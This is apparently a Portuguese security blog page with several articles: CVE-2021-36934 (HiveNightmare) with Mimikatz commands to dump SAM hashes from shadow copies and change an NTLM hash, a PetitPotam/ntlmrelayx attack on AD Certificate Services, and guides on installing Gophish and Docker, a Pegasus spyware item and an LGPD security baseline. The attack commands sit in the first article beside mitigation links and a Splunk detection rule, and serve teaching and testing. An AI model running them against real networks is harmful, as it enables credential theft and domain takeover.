Vulnerabilidade de Escalação de Privilégios Zero-day CVE-2021-36934

Divulgada no dia 20 deste mês, esta é uma vulnerabilidade que um hacker pode utilizar para alcançar níveis mais elevados de privilégios de uma determinada máquina e por conseguinte se movimentar até alcançar o Active Directory, possibilitando explorar outros níveis de acesso dentro da infraestrutura. 

Não há atualização disponível, contudo, a Microsoft lançou uma pequena recomendação para mitigação: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934. 

Figura 1 - Sistema operacional afetado com atualização mais recente

O Windows 11 ainda nem foi lançado, mas a vulnerabilidade SeriousSAM / HiveNightmare da Microsoft relatada recentemente (CVE-2021-36934) afeta a ele e aos atuais sistemas operacionais Windows 10 onipresentes. 

Outro link para fonte de pesquisa e exemplo de mitigação: 

https://www.bleepingcomputer.com/news/microsoft/new-windows-10-vulnerability-allows-anyone-to-get-admin-privileges/

TESTE BÁSICO  

Figura 2 - Digite o comando: icacls c:\windows\system32\config\sam

Se o retorno do comando apresentar a tela desta figura 2, o seu ambiente está vulnerável.  Sobre a legenda acima, os atributos do resultado do comandos significam que: 

(I) - permissão herdada do contêiner pai

RX - racesso para ler e executar

TESTE AVANÇADO

1 - icacls c:\windows\system32\config\sam

2 - Por exemplo, os agentes de ameaças podem usar o seguinte caminho de namespace de dispositivo Win32 para cópias de volume de sombra abaixo para acessar o arquivo SAM por qualquer usuário no computador.

\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM

3 - Usando essas permissões de arquivo baixas e incorretas, junto com cópias de volume de sombra dos arquivos, o pesquisador de segurança e criador do Mimikatz  Benjamin Delpy  disse ao BleepingComputer que você poderia facilmente roubar a senha com hash NTLM de uma conta elevada para obter privilégios mais altos.

Esse ataque é demonstrado no vídeo abaixo criado por Delpy e compartilhado com BleepingComputer que mostra Mimikatz usando um hash NTLM para obter privilégios de depuração.

no Mimikatz 2.2.0x64

COMANDO 1:

lsadump::sam /system:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM /sam:\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM

COMANDO 2:

lsadump::changentlm /user:"Gentil kiwi" /oldntlm:cc36cf7a8514893efccd332446158b1a[tiquete correspondente] /newpassword:password[senha qualquer]

Abra a nova aba ou sessão do mimikatz e digite: privilege::debug

a saída tem que ser algo desete tipo: "Privilege '20' ok".

Figura 3 - Prova de conceito usando o Mimikatz

Os passos abaixo merecem os créditos ao professor Ricardo Tavares. 

1 - Usar este impacket

link: https://github.com/ExAndroidDev/impacket

git clone https://github.com/ExAndroidDev/impacket

cd impacket

git checkout ntlmrelayx-adcs-attack

python3 -m pip install .

estas mudancas ainda não estavam na build nova

2 - Comando do relay (onde neotrantor é o servidor de certificados)

sudo ntlmrelayx.py -debug  -t http://neotrantor.foundation.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

3 - Comando do petitpotam 

Linux

./Petitpotam.py -u '' -p '' -d '' 172.16.207.13 trantor.foundation.local (onde o .13 é o linux seu e o trantor o AD)

ou  no mimikatz

misc::efs /server:172.16.207.11 /connect:172.16.207.13 /noauth (onde 11 é o AD e 13 é o seu linux)

Ferramentas utilizadas: impacket: git clone https://github.com/ExAndroidDev/impacket cd impacket git checkout ntlmrelayx-adcs-attack python3 -m pip install . Exploit PetitPotam: https://github.com/topotam/PetitPotam Mimikatz: https://github.com/gentilkiwi/mimikat... Mitigação: https://support.microsoft.com/en-us/t... Regra de deteção no formato SPLUNK: index=windows EventCode=4768 Certificate_Issuer_Name=*

Fonte: 

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934

https://www.bleepingcomputer.com/news/microsoft/new-windows-10-vulnerability-allows-anyone-to-get-admin-privileges/

https://support.microsoft.com/en-gb/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429

https://conversantgroup.com/serioussam-and-petitpotam-vulnerabilities-affects-windows-operating-systems/

Instalando e configurando o Gophishing em uma VPS

 Por Thiago Alvarenga

O que é o Gophish? 

O Gophish é uma plataforma open source usada para fazer campanhas de Phishing em empresas com o intuito de entender a maturidade dos seus funcionários em discernir um e-mail falso de um e-mail com algum tipo de malware. 

Neste artigo usamos uma VPN da hostinger com o Ubuntu versão 18. 

É esperado que o leitor possua conhecimentos mínimos sobre linux, redes e web. A proposta deste artigo não aborda como criar a campanha e sim o de como instalar e colocá-la em funcionamento. Talvez seja necessário liberar portas no firewall da VPS (IPtables). 

Passo 1

Crie uma pasta chamada gophishing e entre na pasta: mkdir gophishing 

Passo 2

Baixe no git:  wget https://github.com/gophish/gophish/releases/download/v0.11.0/gophish-v0.11.0-linux-64bit.zip

Passo 3

Descompactando com o comando unzip dentro da pasta criada no passo 1.
 

Comando: unzip gophish-v0.11.0-linux-64bit.zip

Passo 4

Edite o arquivo config.json conforme a imagem abaixo:

Passo 5

Agora é necessário fornecer os privilégios necessários ao arquivo gophish com o comando: chmod +x gophish

Passo 6

Teste de funcionamento, com o comando: ./gophish

Desta forma é esperado a seguinte tela, que possui também a senha do primeiro acesso:

Passo 7

Nesta tela é possível ver a tela de funcionamento para criação da primeira campanha: 

Fonte: knowhow 

Instalando o Docker em uma VPS do Hostinger

Pré-requisitos - requisitos do sistema operacional

Para instalar o Docker Engine, você precisa da versão de 64 bits de uma destas versões do Ubuntu:

·       Ubuntu Hirsute 21.04

·       Ubuntu Groovy 20.10

·       Ubuntu Focal 20.04 (LTS)

·       Ubuntu Bionic 18.04 (LTS)

Uma Docker referenciada ao mundo da tecnologia é uma forma de virtualizar aplicações no conceito de “containers”, trazendo da web ou do seu repositório uma instância totalmente pronta para uso, incluindo todas as dependências necessárias para suas funcionalidades. Esta tecnologia surgiu sob a ótica de um projeto de software de código aberto, há uma comunidade open source que auxilia um grupo de voluntários no apoio para melhoria continuada do seu sistema.   

O Docker Engine é compatível com x86_64(ou amd64) armhf, e arm64arquiteturas.

Desinstale versões antigas 

Versões mais antigas do Docker foram chamados docker, docker.ioou docker-engine. Se estiverem instalados, desinstale-os:

sudo apt-get remove docker docker-engine docker.io containerd runc

 

Tudo bem se apt-getrelatar que nenhum desses pacotes está instalado. O conteúdo de /var/lib/docker/, incluindo imagens, contêineres, volumes e redes, é preservado.

 

Desinstale versões antigas 

Você pode instalar o Docker Engine de diferentes maneiras, dependendo de suas necessidades. Neste artigo será apresentada uma forma via repositório:

A maioria dos usuários configura os repositórios do Docker e instala a partir do seu repositório, para facilitar as tarefas de instalação e atualização. Esta é a abordagem recomendada.

 

1.     Instale usando o repositório

Antes de instalar o Docker Engine pela primeira vez em uma nova máquina host, você precisa configurar o repositório do Docker. Depois disso, você pode instalar e atualizar o Docker a partir do repositório.

Configure o repositório

Atualize o apt índice do pacote e instale os pacotes para permitir o apt uso de um repositório por HTTPS:

 

sudo apt-get update

 sudo apt-get install \

    apt-transport-https \

    ca-certificates \

    curl \

    gnupg \

    lsb-release

2.     Adicione a chave GPG oficial Docker

curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg

3.     Use o seguinte comando para configurar o repositório estável

echo \

  "deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu \

  $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null

 

 

4.    Instale o Docker Engine

 

Atualize o sistema usando o apt e instale a versão mais recente do Docker Engine e containerd.

 

sudo apt-get update

 sudo apt-get install docker-ce docker-ce-cli containerd.io

 

 SAÍDA DOS COMANDOS:

 

root@ssl0:~# docker -v

-bash: docker: command not found

root@ssl0:~# apt-get install docker-ce

Reading package lists... Done

Building dependency tree

Reading state information... Done

Package docker-ce is not available, but is referred to by another package.

This may mean that the package is missing, has been obsoleted, or

is only available from another source

 

E: Package 'docker-ce' has no installation candidate

root@ssl0:~# apt-get install docker

Reading package lists... Done

Building dependency tree

Reading state information... Done

docker is already the newest version (1.5-1build1).

0 upgraded, 0 newly installed, 0 to remove and 39 not upgraded.

root@ssl0:~# apt-get remove docker docker-engine docker.io containerd runc

Reading package lists... Done

Building dependency tree

Reading state information... Done

Package 'docker-engine' is not installed, so not removed

Package 'containerd' is not installed, so not removed

Package 'docker.io' is not installed, so not removed

Package 'runc' is not installed, so not removed

The following packages will be REMOVED:

  docker

0 upgraded, 0 newly installed, 1 to remove and 39 not upgraded.

After this operation, 45.1 kB disk space will be freed.

Do you want to continue? [Y/n] y

(Reading database ... 30626 files and directories currently installed.)

Removing docker (1.5-1build1) ...

Processing triggers for man-db (2.8.3-2ubuntu0.1) ...

root@ssl0:~# apt-get install \

>     apt-transport-https \

>     ca-certificates \

>     curl \

>     gnupg \

>     lsb-release

Reading package lists... Done

Building dependency tree

Reading state information... Done

lsb-release is already the newest version (9.20170808ubuntu1).

ca-certificates is already the newest version (20210119~18.04.1).

gnupg is already the newest version (2.2.4-1ubuntu1.4).

The following additional packages will be installed:

  libcurl4

The following NEW packages will be installed:

  apt-transport-https

The following packages will be upgraded:

  curl libcurl4

2 upgraded, 1 newly installed, 0 to remove and 37 not upgraded.

Need to get 382 kB of archives.

After this operation, 154 kB of additional disk space will be used.

Do you want to continue? [Y/n] y

Get:1 http://archive.ubuntu.com/ubuntu bionic-updates/universe amd64 apt-transport-https all 1.6.14 [4348 B]

Get:2 http://archive.ubuntu.com/ubuntu bionic-updates/main amd64 curl amd64 7.58.0-2ubuntu3.14 [159 kB]

Get:3 http://archive.ubuntu.com/ubuntu bionic-updates/main amd64 libcurl4 amd64 7.58.0-2ubuntu3.14 [219 kB]

Fetched 382 kB in 0s (1966 kB/s)

Selecting previously unselected package apt-transport-https.

(Reading database ... 30621 files and directories currently installed.)

Preparing to unpack .../apt-transport-https_1.6.14_all.deb ...

Unpacking apt-transport-https (1.6.14) ...

Preparing to unpack .../curl_7.58.0-2ubuntu3.14_amd64.deb ...

Unpacking curl (7.58.0-2ubuntu3.14) over (7.58.0-2ubuntu3.13) ...

Preparing to unpack .../libcurl4_7.58.0-2ubuntu3.14_amd64.deb ...

Unpacking libcurl4:amd64 (7.58.0-2ubuntu3.14) over (7.58.0-2ubuntu3.13) ...

Setting up apt-transport-https (1.6.14) ...

Setting up libcurl4:amd64 (7.58.0-2ubuntu3.14) ...

Setting up curl (7.58.0-2ubuntu3.14) ...

Processing triggers for man-db (2.8.3-2ubuntu0.1) ...

Processing triggers for libc-bin (2.27-3ubuntu1.4) ...

root@ssl0:~# curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg

root@ssl0:~# echo \

>   "deb [arch=amd64 signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/ubuntu \

>   $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null

root@ssl0:~# apt-get update

Hit:1 http://archive.canonical.com/ubuntu bionic InRelease

Hit:2 http://archive.ubuntu.com/ubuntu bionic InRelease

Get:3 http://archive.ubuntu.com/ubuntu bionic-updates InRelease [88.7 kB]

Get:4 https://download.docker.com/linux/ubuntu bionic InRelease [64.4 kB]

Get:5 http://security.ubuntu.com/ubuntu bionic-security InRelease [88.7 kB]

Get:6 https://download.docker.com/linux/ubuntu bionic/stable amd64 Packages [19.1 kB]

Get:7 http://archive.ubuntu.com/ubuntu bionic-updates/main amd64 Packages [2160 kB]

Get:8 http://archive.ubuntu.com/ubuntu bionic-updates/restricted amd64 Packages [413 kB]

Get:9 http://archive.ubuntu.com/ubuntu bionic-updates/restricted Translation-en [56.0 kB]

Get:10 http://archive.ubuntu.com/ubuntu bionic-updates/universe amd64 Packages [1743 kB]

Get:11 http://archive.ubuntu.com/ubuntu bionic-updates/universe Translation-en [373 kB]

Get:12 http://security.ubuntu.com/ubuntu bionic-security/main amd64 Packages [1814 kB]

Get:13 http://security.ubuntu.com/ubuntu bionic-security/restricted amd64 Packages [389 kB]

Get:14 http://security.ubuntu.com/ubuntu bionic-security/restricted Translation-en [52.3 kB]

Get:15 http://security.ubuntu.com/ubuntu bionic-security/universe amd64 Packages [1132 kB]

Get:16 http://security.ubuntu.com/ubuntu bionic-security/multiverse amd64 Packages [20.9 kB]

Get:17 http://security.ubuntu.com/ubuntu bionic-security/multiverse Translation-en [4732 B]

Fetched 8420 kB in 3s (3283 kB/s)

Reading package lists... Done

root@ssl0:~# apt-get install docker-ce docker-ce-cli containerd.io

Reading package lists... Done

Building dependency tree

Reading state information... Done

The following additional packages will be installed:

  apparmor docker-ce-rootless-extras docker-scan-plugin pigz

Suggested packages:

  apparmor-profiles-extra apparmor-utils aufs-tools cgroupfs-mount | cgroup-lite

Recommended packages:

  slirp4netns

The following NEW packages will be installed:

  apparmor containerd.io docker-ce docker-ce-cli docker-ce-rootless-extras docker-scan-plugin pigz

0 upgraded, 7 newly installed, 0 to remove and 37 not upgraded.

Need to get 104 MB of archives.

After this operation, 450 MB of additional disk space will be used.

Do you want to continue? [Y/n] y

Get:1 http://archive.ubuntu.com/ubuntu bionic/universe amd64 pigz amd64 2.4-1 [57.4 kB]

Get:2 https://download.docker.com/linux/ubuntu bionic/stable amd64 containerd.io amd64 1.4.8-1 [24.7 MB]

Get:3 http://archive.ubuntu.com/ubuntu bionic-updates/main amd64 apparmor amd64 2.12-4ubuntu5.1 [487 kB]

Get:4 https://download.docker.com/linux/ubuntu bionic/stable amd64 docker-ce-cli amd64 5:20.10.7~3-0~ubuntu-bionic [41.4 MB]

Get:5 https://download.docker.com/linux/ubuntu bionic/stable amd64 docker-ce amd64 5:20.10.7~3-0~ubuntu-bionic [24.8 MB]

Get:6 https://download.docker.com/linux/ubuntu bionic/stable amd64 docker-ce-rootless-extras amd64 5:20.10.7~3-0~ubuntu-bionic [9061 kB]

Get:7 https://download.docker.com/linux/ubuntu bionic/stable amd64 docker-scan-plugin amd64 0.8.0~ubuntu-bionic [3888 kB]

Fetched 104 MB in 9s (11.9 MB/s)

Preconfiguring packages ...

Selecting previously unselected package pigz.

(Reading database ... 30625 files and directories currently installed.)

Preparing to unpack .../0-pigz_2.4-1_amd64.deb ...

Unpacking pigz (2.4-1) ...

Selecting previously unselected package apparmor.

Preparing to unpack .../1-apparmor_2.12-4ubuntu5.1_amd64.deb ...

Unpacking apparmor (2.12-4ubuntu5.1) ...

Selecting previously unselected package containerd.io.

Preparing to unpack .../2-containerd.io_1.4.8-1_amd64.deb ...

Unpacking containerd.io (1.4.8-1) ...

Selecting previously unselected package docker-ce-cli.

Preparing to unpack .../3-docker-ce-cli_5%3a20.10.7~3-0~ubuntu-bionic_amd64.deb ...

Unpacking docker-ce-cli (5:20.10.7~3-0~ubuntu-bionic) ...

Selecting previously unselected package docker-ce.

Preparing to unpack .../4-docker-ce_5%3a20.10.7~3-0~ubuntu-bionic_amd64.deb ...

Unpacking docker-ce (5:20.10.7~3-0~ubuntu-bionic) ...

Selecting previously unselected package docker-ce-rootless-extras.

Preparing to unpack .../5-docker-ce-rootless-extras_5%3a20.10.7~3-0~ubuntu-bionic_amd64.deb ...

Unpacking docker-ce-rootless-extras (5:20.10.7~3-0~ubuntu-bionic) ...

Selecting previously unselected package docker-scan-plugin.

Preparing to unpack .../6-docker-scan-plugin_0.8.0~ubuntu-bionic_amd64.deb ...

Unpacking docker-scan-plugin (0.8.0~ubuntu-bionic) ...

Setting up containerd.io (1.4.8-1) ...

Created symlink /etc/systemd/system/multi-user.target.wants/containerd.service → /lib/systemd/system/containerd.service.

Setting up docker-ce-rootless-extras (5:20.10.7~3-0~ubuntu-bionic) ...

Setting up docker-scan-plugin (0.8.0~ubuntu-bionic) ...

Setting up apparmor (2.12-4ubuntu5.1) ...

Created symlink /etc/systemd/system/sysinit.target.wants/apparmor.service → /lib/systemd/system/apparmor.service.

Setting up docker-ce-cli (5:20.10.7~3-0~ubuntu-bionic) ...

Setting up pigz (2.4-1) ...

Setting up docker-ce (5:20.10.7~3-0~ubuntu-bionic) ...

Created symlink /etc/systemd/system/multi-user.target.wants/docker.service → /lib/systemd/system/docker.service.

Created symlink /etc/systemd/system/sockets.target.wants/docker.socket → /lib/systemd/system/docker.socket.

Processing triggers for man-db (2.8.3-2ubuntu0.1) ...

Processing triggers for systemd (237-3ubuntu10.47) ...

root@ssl0:~# docker -v

Docker version 20.10.7, build f0df350

 

 

Fonte: https://docs.docker.com/engine/install/ubuntu/

Spyware Pegasus do Grupo NSO

 O Laboratório de Segurança da Amnistia Internacional “revelou vigilância ilegal generalizada, persistente e contínua e abusos dos direitos humanos perpetrados com o spyware Pegasus do Grupo NSO”. O Relatório de Metodologia Forense também inclui uma ferramenta forense para detectar a presença do spyware em dispositivos móveis. Fonte: SANS. 

Git: https://github.com/mvt-project/mvt

Este link acima é uma prova de conceito usada para encontrar indicadores deste Spyware. A sua utilização necessita de conhecimentos avançados em tecnologia. 

https://www.monitordooriente.com/20210525-empresa-fornecedora-do-software-espiao-pegasus-abandona-licitacao/

Apesar de IOS e Androids investirem muito em segurança, invadir um Desktop ainda é mais fácil, entretanto, o Pegasus está conseguindo diminir esta diferença com muita facilidade.  

Fonte: SANS NewsBites Vol. 23 Num. 057.

Cinco funções básicas de segurança da informação que toda empresa precisa ter para atender às exigências da LGPD.

 

BASELINE MÍNIMO PARA SEGURANÇA DA INFORMAÇÃO

Premissa: Minimização dos dados, o único dado que não pode ser hackeado é o dado que você não tem.

Abre-se aqui um parêntese, não é nenhuma novidade e todos sabem, a segurança da informação é negligenciada pelas empresas por padrão e muitas empresas ou órgãos públicos só estão se preocupando agora por uma imposição da legislação, a  Lei Geral de Proteção de dados Pessoais (LGPD). Agora, com a LGPD é previsto multas, sanções administrativas e proibição de uso dos dados. Dito isto, não há uma bruxaria ou uma receita mágica que irá colocar uma empresa, seja ela de pequeno, médio ou de grande porte, em conformidade com a Legislação. 

Para isto é necessário de mão de obra especializada envolvendo algumas áreas do conhecimento, vejamos: Jurídicas, Compliance, TI e Cibersegurança. 

Para quem é este artigo? Este artigo é para profissionais de tecnologia e de segurança da informação que queiram entender a sinergia de um Framework de Segurança da Informação, algumas ponderações básicas norteadoras. 

Maturidade dos Controles: Procure criar políticas de gestão para GOVERNANÇA DE DADOS dentro da empresa. Há três aspectos essenciais neste quesito: 

a) a segurança física das instalações e dos espaços operacionais; 

b) a segurança relativa ao pessoal que trabalha e manipula a informação classificada ou sensível; e 

c) finalmente, a segurança do material que suporta a informação. 

Nestes aspectos supracitados, as empresas ou organizações precisam desenvolver uma capacidade própria de defesas das suas redes informatizada, através de prevenção, capacidade de detecção, resiliência e recuperação. Estas dicas abaixo podem ser norteadoras para iniciar os trabalhos. 

Framework de Segurança Básico: 

Figura 1 - Cyber Security Framework Nist 1800-26A

1 - A capacidade de Identificar um Risco:

Desenvolva uma compreensão organizacional para gerenciar o risco de segurança cibernética para sistemas, pessoas, ativos, dados e recursos.

Qual a principal premissa neste ponto? Simples, a empresa precisa identificar quais os seus pontos fracos e para isto é necessário entender a sua maturidade sobre todos os ativos tecnológicos e físicos. 

A empresa realiza algum tipo de Pentest? 

Contrate uma empresa ou profissional para mapeamento de suas vulnerabilidades, se possível, crie um time de Redteam. 

           Outro ponto, empresas de pequeno porte podem buscar adequar-se neste item da seguinte 

           forma: 

1. Antivírus;
2. Habilitar criptografia em desktop (Bitlocker);
3. Criptografia do Smartphone;
4. Backup em Nuvens (OneDriver) e Google Fotos, por exemplo;
5. Treinamento.          

Sugestão: adote também um software para fazer uma varredura das suas vulnerabilidades, um bom software para isso e totalmente gratuito é o openvas, tem curso dele ensinando a utilizar na Udemy por menos de 30 reais, https://www.udemy.com/share/104t3Y2@PW5gaFpYS1IHck54O0hO/. 

2 - A capacidade de proteger a Informação: 

Desenvolver e implementar salvaguardas adequadas para garantir a entrega de Serviços.

Sob o conjunto de soluções para proteger a informação ainda é possível pontuar sobre as Políticas de Segurança da Informação, Campanhas de conscientização e várias tecnologias que juntas, podem contribuir contra esta guerra cibernética. 

Para uma pequena ou média empresa, é possível iniciar com uma solução de antivírus, porém, atualmente ele sozinho já não atende às novas incursões criminosas dos hackeres, por este motivo o mercado oferece algo denominado como Endpoint, um conjunto de ferramentas que faz uma gestão aperfeiçoada de cada máquina. Em outras palavras, é um software de antivírus com uma plataforma que gerencia todas as estações de trabalho fazendo a análise  de todos os programas instalados considerados vulneráveis, sites vulneráveis, e-mails com spam e arquivos maliciosos; entre outras ações.  

Resumindo, uma empresa precisa de investimento em firewall, um pfSense (ele é gratuíto), por exemplo; uma boa solução de antivírus (Endpoint); um NOC (Network Operation Center), capaz de monitorar eventos envolvendo todo parque tecnológico. Por fim, em pessoal com o gabarito necessário para atender estas demandas.  

  

3 - A capacidade de detectar um risco iminente;

Desenvolver e implementar atividades adequadas para IDENTIFICAR UMA OCORRÊNCIA de um evento de cibersegurança.

A capacidade de detectar um risco iminente está totalmente relacionada a um bom monitoramento em tempo real e para este tipo de ação, há algumas plataformas que atende estes requisitos:

• AlienVault; 
• Graylog, PiDense (Detecção de ataques wifi: Pineapple Activety, Karma Attacks, Eviroment threats, Deauth Attacks, Other Fake AP Tactics);
• Defesas em aplicações Web: implementação de proteções de firewalls a nível de aplicação (WAF - Web Application Firewall) Cloudflare e o Wazuh, são exemplos de soluções possíveis.

4 - A capacidade de responder ao incidente;

Desenvolver e implementar atividades adequadas para AGIR EM RELAÇÃO A UM INCIDENTE de segurança cibernética detectada.

Um incidente é um evento que pode levar à perda ou interrupção das operações, serviços ou funções de uma organização

Este é um assunto muito denso, entretanto, como a intenção é a de criar um norte, não iremos aprofundar. 

Esta maturidade para responder a um incidente cibernético é avaliado sob a capacidade de uma empresa ou organização de manter a proteção dos seus sistemas informatizados de vários tipos de ameaças garantindo a continuidade do negócio, minimizando os riscos.  

Um incidente passar por algumas fazes,  i) Identificação do incidente; ii) Reposição dos serviços afetados (mitigação); iii) Documentação; e, iv) Lições aprendidas; v) Comunicação entre às partes envolvidas. 

Alinhado ao parque tecnológico da empresa e consoante a capacidade de detectar as ameaças, visto que se uma empresa não tem capacidade de detectar, possivelmente ela não terá capacidade de responder ao incidente, pelo menos em tempo hábil.  

Segundo o Framework Information Technology infrastructure Library (ITIL v3), a  gestão de incidentes é um processo que integra a operação de serviços, a gestão de eventos, gestão de problemas e gestão de acessos.  Assim sendo, é importante que a área que define o Compliance e a área responsável por sua execução sejam distintas, separadas. 

Dentro desta capacidade de resposta ao incidente, é importante pensar em um plano de ação (Incident Handling), um plano de ação para tratar o incidente. Neste preceito, quando ocorrer um incidente fica mais fácil agir.  Algumas regulamentações internacionais exigem um Incident Handing's, regulamentação PCI. Desta forma é necessário que este plano contenha:

1. Preparação - manter o time prontos para lidar com incidente;
2. Identificação - capacidade de obter eventos online-real-time, analisar e então determinar se foi um incidente;
3. Contenção - parar o dano e fazer as imagens forense, evitando assim, que o dano se agrave; 
• Contenção de curto prazo;
• Backup do sistema;
• Contenção de longo prazo;
• Erradicação - Limpar e remover os artefatos deixados pelos atacantes;
4. Investigação forense - é necessário investigar a causa raíz do incidente, caso contrário a empresa poderá responder por destruição de provas, Artigo 305 CP. O simples ato de desligar o computador de forma incorreta, pode configurar este crime já que a memória RAM não guarda mais as informações quando o computador é desligado. Este pode ser uns dos exemplos.   
5. Recuperação - Voltar aos negócios de forma gradativa;
6. Lições Aprendidas - Documentar todos eventos e planos de ações adotadas,
7. Comunicação [sugestão], as empresas passam a ter que divulgar os incidentes. 

 

5 - A capacidade de recuperar de um incidente;

Desenvolver e implementar atividades adequadas para MANTER OS PLANOS DE RESILIÊNCIA e para restaurar quaisquer recursos ou serviços que foram prejudicados devido a um incidente de Cibersegurança. 

Esta capacidade pode ser um divisor de águas para determinar se uma empresa ainda permanecerá no mercado ou deixará de existir. Há empresas que acabam deixando de existir por não conseguirem os seus dados, a exemplo: os ataques de sequestro denominados de ransomwares. Para esta ação, é necessário sempre buscar uma harmonia entre todos os demais passos, ter politicas bem definidas de Desastre Recovery. Temos o Zerto como plataforma desenhada para esta finalidade, que nos traz uma maior resiliência e o Yara para como ferramenta para ajudar a identificar e classificar amostras de malwares, assim como o Alien Vault (SIEM - Gerenciamento e Correlação de Eventos de Segurança).

 

Por fim, é recomendado ainda que tudo seja documentado, cada tipo de ação para provar que a empresa não quebre o pilar responsabilidade civil: negligente, imperita ou imprudente no tratamento dos dados.

Neste último parágrafo, é importante fazer um adendo, exemplificar os pilares da responsabilidade civil ao que tange a interpretação da LGPD: 

IMPRUDÊNCIA - A Empresa ou Organização deixa de respeitar alguma norma, procedimento que gere e/ou ofereça um risco de vazamento de dados; 

NEGLIGÊNCIA - O Controlador age com desleixo e não se importa com o resultado sobre um incidente de segurança; 

IMPERÍCIA - A Empresa ou Organização não  foi capaz tecnicamente de forma comprovada, de tratar os dados do titular;

Fonte: 

http://ws2.din.uem.br/~ademir/sbpo/sbpo2009/artigos/55438.pdf

https://revista.enap.gov.br/index.php/RSP/article/download/3210/2763/16465

https://fenix.tecnico.ulisboa.pt/downloadFile/1126295043834849/MestradoSIDC(PNeves).pdf

https://bitwarden.com/

https://csrc.nist.gov/glossary/term/computer_security_incident

Recomendações de leitura: 

Data Integrity: Detecting and Responding to Ransomware and Other Destructive Events

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.1800-26.pdf

Nist Privacy Framework: A Tool For Improving Privacy Through Enterprise | PT -BR

https://www.nist.gov/system/files/documents/2021/09/02/NIST.CSWP_.01162020pt.pdf

Framework for Improving Critital Infrastructure Cybersecurity

1 - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf

2 - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018pt.pdf

Estrutura de gerenciamento de risco para sistemas de informação e organizações

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-37r2.pdf

Protegendo Informações Não Classificadas Controladas em Sistemas e Organizações de Informação Não Federais

https://csrc.nist.gov/CSRC/media/Publications/sp/800-171/rev-1/archive/2016-12-20/documents/sp800-171r1-20161220.pdf